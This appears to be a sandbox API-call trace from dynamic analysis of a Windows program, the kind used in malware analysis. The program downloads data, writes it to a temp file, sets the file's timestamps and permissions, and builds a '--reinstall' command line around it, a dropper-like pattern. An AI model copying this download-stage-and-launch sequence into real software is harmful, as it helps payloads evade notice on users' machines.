	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.551] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0084.551] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0084.551] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0084.556] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x746988 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\") returned 0x25
	[0084.556] GetTempFileNameW (in: lpPathName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x747cf0 | out: lpTempFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\tmp8c77.tmp")) returned 0x8c77
	[0084.556] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x31
	[0084.556] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp", lpDst=0x3928eb0, nSize=0x31 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp") returned 0x31
	[0084.556] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\tmp8c77.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0
	[0084.557] GetSystemTime (in: lpSystemTime=0x26afe1c | out: lpSystemTime=0x26afe1c*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0xd, wHour=0xe, wMinute=0x1, wSecond=0x30, wMilliseconds=0x31d)) 
	[0084.557] SystemTimeToFileTime (in: lpSystemTime=0x26afe1c, lpFileTime=0x26afe60 | out: lpFileTime=0x26afe60) returned 1
	[0084.557] SystemTimeToFileTime (in: lpSystemTime=0x26afe1c, lpFileTime=0x26afe68 | out: lpFileTime=0x26afe68) returned 1
	[0084.557] SystemTimeToFileTime (in: lpSystemTime=0x26afe1c, lpFileTime=0x26afe70 | out: lpFileTime=0x26afe70) returned 1
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.557] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] GetLastError () returned 0xb7
	[0084.558] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x1c
	[0084.558] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x39023c8, nSize=0x1c | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c
	[0084.558] CreateFileW (lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a4
	[0084.559] GetFileTime (in: hFile=0x39023c8, lpCreationTime=0x26afe60, lpLastAccessTime=0x26afe68, lpLastWriteTime=0x26afe70 | out: lpCreationTime=0x26afe60*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastAccessTime=0x26afe68*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastWriteTime=0x26afe70*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2)) returned 0
	[0084.559] SystemTimeToFileTime (in: lpSystemTime=0x26afe1c, lpFileTime=0x26afe60 | out: lpFileTime=0x26afe60) returned 1
	[0084.559] SystemTimeToFileTime (in: lpSystemTime=0x26afe1c, lpFileTime=0x26afe68 | out: lpFileTime=0x26afe68) returned 1
	[0084.559] SystemTimeToFileTime (in: lpSystemTime=0x26afe1c, lpFileTime=0x26afe70 | out: lpFileTime=0x26afe70) returned 1
	[0084.559] CloseHandle (hObject=0x2a4) returned 1
	[0084.559] WriteFile (in: hFile=0x2a0, lpBuffer=0x3a5b4e8*, nNumberOfBytesToWrite=0x3d600, lpNumberOfBytesWritten=0x26afe78, lpOverlapped=0x0 | out: lpBuffer=0x3a5b4e8*, lpNumberOfBytesWritten=0x26afe78*=0x3d600, lpOverlapped=0x0) returned 1
	[0084.562] SetEndOfFile (hFile=0x2a0) returned 1
	[0084.562] SetFileTime (hFile=0x2a0, lpCreationTime=0x26afe60, lpLastAccessTime=0x26afe68, lpLastWriteTime=0x26afe70) returned 1
	[0084.562] FlushFileBuffers (hFile=0x2a0) returned 1
	[0084.565] CloseHandle (hObject=0x2a0) returned 1
	[0084.569] AllocateAndInitializeSid (in: pIdentifierAuthority=0x26afe88, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x26afe94 | out: pSid=0x26afe94*=0x397ea88*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
	[0084.569] SetEntriesInAclW () returned 0x0
	[0084.820] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x396e8b0
	[0084.820] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x396e8b0, dwRevision=0x1 | out: pSecurityDescriptor=0x396e8b0) returned 1
	[0084.820] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x396e8b0, bDaclPresent=1, pDacl=0x39a1b28, bDaclDefaulted=0 | out: pSecurityDescriptor=0x396e8b0) returned 1
	[0084.820] SetFileSecurityW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp", SecurityInformation=0x4, pSecurityDescriptor=0x396e8b0) returned 1
	[0084.821] LocalFree (hMem=0x39a1b28) returned 0x0
	[0084.821] LocalFree (hMem=0x396e8b0) returned 0x0
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.821] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.822] GetLastError () returned 0x6
	[0084.823] GetLastError () returned 0x6
	[0084.823] GetLastError () returned 0x6
	[0084.823] GetLastError () returned 0x6
	[0084.823] GetLastError () returned 0x6
	[0084.823] GetLastError () returned 0x6
	[0084.823] GetLastError () returned 0x6
	[0084.823] GetLastError () returned 0x6
	[0084.823] StrCpyW (in: psz1=0x746988, psz2="\"" | out: psz1="\"") returned="\""
	[0084.823] StrCatW (in: psz1="\"", psz2="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp" | out: psz1="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp") returned="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp"
	[0084.823] StrCatW (in: psz1="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp", psz2="\" --reinstall" | out: psz1="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" --reinstall") returned="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" --reinstall"
